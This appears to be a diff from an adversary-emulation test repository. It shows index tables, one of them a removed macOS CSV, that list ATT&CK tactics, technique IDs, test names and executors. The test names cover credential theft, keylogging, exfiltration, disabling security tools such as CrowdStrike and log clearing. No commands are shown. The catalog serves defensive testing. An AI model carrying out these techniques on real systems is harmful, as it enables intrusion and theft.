242 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
243 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
244 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
245 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
246 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
247 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
248 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
249 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
250 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
251 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
252 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
253 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
254 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
255 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
256 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
257 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
258 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
259 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts (Linux) 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
260 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables (Linux) 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
261 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 bash
262 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
263 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
264 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
265 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
266 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
267 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
268 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
atomics/Indexes/Indexes-CSV/macos-index.csv
-208
View File
@@ -1,208 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
persistence,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
